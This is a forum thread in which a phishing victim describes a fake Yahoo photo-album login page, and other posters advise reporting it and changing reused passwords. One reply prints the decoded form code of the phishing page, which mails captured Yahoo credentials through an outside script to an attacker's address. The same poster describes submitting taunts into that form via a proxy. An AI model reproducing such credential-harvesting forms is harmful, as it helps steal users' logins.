 FlexBaud Premium join:2004-10-06 Pensacola, FL clubs:
| Password Stolen
Well, This was just great!
I was on yahoo messenger. I never go into chat rooms and very few people know my ID. Someone sends me a link to a page which appears to be a Yahoo Photo Album, It looked like a legit site and the URL looked legit.
At the same time, I was under a lot of stress from my ex-girlfriend so I couldn't focus 100%.
So, assuming it was a legit site, I signed in. It then seemed like a login page rather than a direct link to a album, so I figured the person gave me the wrong link.
A few mins later "You have been signed off Yahoo because you signed in from another location"
I was able to enter my personal info at yahoo, and changed all my passwords.
»www.geocities.com/login_xp3/login.htm?200514
That's the page.. from a quick look, it doesn't look "fake" but, indeed, it is.
I'm about to kick myself.. I've always been VERY CAREFUL and used to get stuff like this all the time and I NEVER fell for it... never thought it would've happened to me.
Don't ever say never. |
|
 adamt56
join:2005-06-21 Saint Petersburg, FL | Have you reported this to Yahoo? |
|
 FlexBaud Premium join:2004-10-06 Pensacola, FL clubs:
| said by adamt56 :Have you reported this to Yahoo? No, I don't know where to report it at. |
|
  MrBradTX
join:2001-05-23 Carrollton, TX edit: September 16th, @01:07PM
| abuse@yahoo.com abuse@geocities.com |
|
 FlexBaud Premium join:2004-10-06 Pensacola, FL clubs:
| said by MrBradTX :abuse@yahoo.com abuse@geocities.com Thank You, Sent. |
|
 bpm3k
join:2004-08-15 Simi Valley, CA
edit: September 16th, @03:31PM
| reply to FlexBaud _ |
|
  koolman2 Premium join:2002-10-01 Anchorage, AK
·GCI.net
·Clearwire Wireless
| reply to FlexBaud I love the notice at the bottom.
quote: NOTICE: We collect personal information on this site.
-- "I wonder if other dogs think poodles are members of a weird religious cult." -Rita Rudner |
|
 KyeU
join:2003-12-31 Canada
edit: September 16th, @04:49PM
| reply to FlexBaud The page was encrypted, but I decrypted it and found this:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/ mailto.cgi" ENCTYPE="x-www-form-urlencoded"> . . . <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="midas_guara_18@hotmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos"> midas_guara_18@hotmail.com
I'm tempted to say hello to him in his language, Portuguese...
EDIT: Done. Entered his email address in the Name box and entered a very 'nice' Portuguese slang in the Password box...sorry, I couldn't help it. I don't like lamers like our friend here. (Don't worry, I used a proxy xD)
EDIT2: Found more information on the mail.cgi script:
»world.altavista.com/babelfish/tr···id%3D240
Apparently its been used for fraud.
EDIT3: Did a search for his E-Mail address, and it appears he was/is a member on "DarK FantasyZ" and "the-outback.net". (Both forums are now non-existent.) |
|
  EGeezer Spring is here Premium join:2002-08-04 Central Ohio clubs: | Just out of curiosity, when the email is sent to the hotmail account, whose address shows up in the "from" field of that email ? -- Every Good Electrical Engineer Zeroes Each Register |
|
  Devious Premium join:2003-10-16 Tucson, AZ
| said by EGeezer :Just out of curiosity, when the email is sent to the hotmail account, whose address shows up in the "from" field of that email ? "Yahoo id" -- techiekid.net |
|
 KyeU
join:2003-12-31 Canada edit: September 18th, @03:14AM
| reply to FlexBaud
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> |
|
  Devious Premium join:2003-10-16 Tucson, AZ
| said by KyeU :[code] [/code] Ohh, yes. I got confused while posting earlier, I thought he meant the subject. Whoops!  -- techiekid.net |
|
  Doctor Olds I Need A Remedy For What's Ailing Me. Premium,VIP join:2001-04-19 1970 442 W30 clubs:
| reply to FlexBaud said by FlexBaud :said by MrBradTX :abuse@yahoo.com abuse@geocities.com Thank You, Sent. Wonder why it's still up 48 hours later??? Might want to complain again..... -- Whats the point of owning a supercar if you cant scare yourself stupid from time to time? |
|
 FlexBaud Premium join:2004-10-06 Pensacola, FL clubs:
| reply to FlexBaud Okay, I've got another question.
The username/password I used for Yahoo (which is now changed) is the same as my company ID/Password.
With my Company ID, I have options for Inventory Management, and Pricing.
I highly doubt the person that has my password will have access to my company's system, but, Would it be a good idea to change my password just to be on the safe side? |
|
  norwegian Premium join:2005-02-15 Outback
·WestNet Broadband
| reply to FlexBaud m1k3l sorry to hear that someone out there likes, and has nothing better to do than go hunting for victims, and you happened to be unlucky enough to experience their exploits
i sit in wonder at the intelligence of some of the people here, and the help you have received.
seriously tho, if you have the belief that your passwords were taken from you, i would go through and change any passwords you have , it maybe hard to deal with at first, but in the outcome it is the only option you have
if he/she got that close, dont go leaving an open door
just my 2 bob
good luck sorting it all out
norwegian |
|
  Dipsomaniac Oh My, Yes.
join:2001-12-12 Toronto, ON
·Rogers Hi-Speed
| reply to FlexBaud It is *always a good idea to change your password just to be safe. If you've used a password in more than one spot, it is a good idea to change it everywhere it's used if it's compromised anywhere. -- Therapy is expensive. Bubble wrap is free. |
|
  Steve SAS-70 is extortion Consultant join:2001-03-10 Tustin, CA | reply to FlexBaud It's nice to know some of the Yahoo! Paranoids (security staff); the site's been taken down. |
|
 KyeU
join:2003-12-31 Canada
| said by Steve :It's nice to know some of the Yahoo! Paranoids (security staff); the site's been taken down. FINALLY. Took them 3 days o_O |
|
  Steve SAS-70 is extortion Consultant join:2001-03-10 Tustin, CA
| said by KyeU :FINALLY. Took them 3 days o_O ... but it only took around six hours once the right guy had it  |
|
  GKJUG
@ziplink.net | reply to FlexBaud quote: Would it be a good idea to change my password just to be on the safe side?
Always. Yes.
If my sixth sense warns me that a password might've been compromised I change it. |
|